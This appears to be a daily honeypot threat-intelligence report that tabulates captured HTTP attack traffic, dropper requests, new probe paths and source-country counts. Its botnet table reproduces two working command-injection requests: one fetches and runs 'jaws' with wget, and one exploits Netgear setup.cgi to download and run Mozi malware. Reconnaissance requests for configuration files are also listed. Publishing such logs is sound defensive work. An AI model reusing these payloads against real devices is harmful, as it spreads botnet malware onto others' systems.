
Report: 2025-06-04

Author
Shoggoth Industries

Daily Report: 2025-06-04

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 39 new requests that have never been observed before (these were added to the monitored request database).

A total of 1330 requests were recorded during the day, originating from 2 different countries, with a peak of 305 requests coming from the US.

ot_simplified_report

Simplified report of medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more information, contact us at social@shoggoth.industries.

| source_country | targeted_country |
|---|---|
| US | Dubai |
| US | Israel |

botnet_dropper_behaviour

| remote_addr | request |
|---|---|
| 104.236.3.45 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws HTTP/1.1 |
| 1.70.141.84 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://1.70.141.84:33659/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |

request

The requests listed here are those that have not yet been integrated into the request database.

|  | number_of_occurence | request |
|---|---|---|
| 212 | 1 | GET /admin/login.asp HTTP/1.1 |
| 214 | 1 | GET /odinhttpcall1749065828 HTTP/1.1 |
| 215 | 1 | GET /OdinHttpCall1749065828 HTTP/1.1 |
| 216 | 1 | GET /Odin/http/call1749065828 HTTP/1.1 |
| 252 | 1 | GET /odinhttpcall1748998981 HTTP/1.1 |
| 253 | 1 | GET /OdinHttpCall1748998981 HTTP/1.1 |
| 254 | 1 | GET /Odin/http/call1748998981 HTTP/1.1 |
| 287 | 1 | \x04\x01\x01\xBB\x00\x00\x00\x01\x00api.ipify.org\x00 |
| 288 | 1 | CONNECT api.ipify.org:443 HTTP/1.1 |
| 313 | 1 | GET /8dhX HTTP/1.1 |
| 314 | 1 | GET /6z6w HTTP/1.1 |
| 329 | 1 | GET /db.yml HTTP/1.1 |
| 330 | 1 | GET /db.yaml HTTP/1.1 |
| 331 | 1 | GET /db.config HTTP/1.1 |
| 332 | 1 | GET /dbconfig.php HTTP/1.1 |
| 341 | 1 | GET /docker-compose.yaml HTTP/1.1 |
| 342 | 1 | GET /docker-compose.dev.yml HTTP/1.1 |
| 349 | 1 | GET /serverless.yaml HTTP/1.1 |
| 350 | 1 | GET /serverless.json HTTP/1.1 |
| 360 | 1 | GET /config/settings.yml HTTP/1.1 |
| 388 | 1 | GET /system_info.php HTTP/1.1 |
| 390 | 1 | GET /swagger.yaml HTTP/1.1 |
| 391 | 1 | GET /swagger.yml HTTP/1.1 |
| 393 | 1 | GET /api/swagger.yaml HTTP/1.1 |
| 394 | 1 | GET /api/swagger.yml HTTP/1.1 |
| 395 | 1 | GET /api/v1/swagger.json HTTP/1.1 |
| 396 | 1 | GET /api/v2/swagger.json HTTP/1.1 |
| 397 | 1 | GET /api/documentation.json HTTP/1.1 |
| 411 | 1 | GET /vue.config.js HTTP/1.1 |
| 413 | 1 | GET /webpack.dev.js HTTP/1.1 |
| 414 | 1 | GET /webpack.prod.js HTTP/1.1 |
| 418 | 1 | GET /angular-cli.json HTTP/1.1 |
| 426 | 1 | GET /LlCa HTTP/1.1 |
| 427 | 1 | GET /OmXI HTTP/1.1 |
| 436 | 1 | \x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xF6~\xF7\x7F\x00\x00\xB0\xF8\xF1s\xCF\x00\x00\x00\xE0\x81\x1B\x7F\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 |
| 442 | 1 | \x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\x8A\xBD\xF7\x7F\x00\x00\x90\xF6\x85\xAA\xAE\x00\x00\x00\xE0\x81\xAF\xBD\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 |
| 445 | 1 | GET /odinhttpcall1749060061 HTTP/1.1 |
| 446 | 1 | GET /OdinHttpCall1749060061 HTTP/1.1 |
| 447 | 1 | GET /Odin/http/call1749060061 HTTP/1.1 |

country_iso_code

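|  | number_of_occurence | country_iso_code |
|---|---|---|
| 0 | 305 | US |
| 1 | 219 | BG |
| 2 | 130 | DE |
| 3 | 96 | CN |
| 4 | 94 | GB |
| 5 | 61 | JP |
| 6 | 54 | CA |
| 7 | 49 | IN |
| 8 | 48 | HK |
| 9 | 39 | NL |
| 10 | 32 | NG |
| 11 | 24 | PL |
| 12 | 24 | SA |
| 13 | 17 | SC |
| 14 | 15 | PT |
| 15 | 15 | CH |
| 16 | 15 | FR |
| 17 | 12 | AR |
| 18 | 9 | GH |
| 19 | 7 | IL |
| 20 | 5 | TR |
| 21 | 5 | RU |
| 22 | 5 | UA |
| 23 | 5 | BE |
| 24 | 5 | AO |
| 25 | 4 | ZA |
| 26 | 4 | ID |
| 27 | 3 | KR |
| 28 | 3 | IT |
| 29 | 3 | KZ |
| 30 | 3 | SG |
| 31 | 2 | RO |
| 32 | 2 | VN |
| 33 | 2 | TW |
| 34 | 2 | BR |
| 35 | 2 | IE |
| 36 | 2 | CO |
| 37 | 2 | HR |
| 38 | 1 | MC |
| 39 | 1 | IR |
| 40 | 1 | ES |
| 41 | 1 | QA |
| 42 | 1 | SE |
| 43 | 1 | CZ |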
431CZ
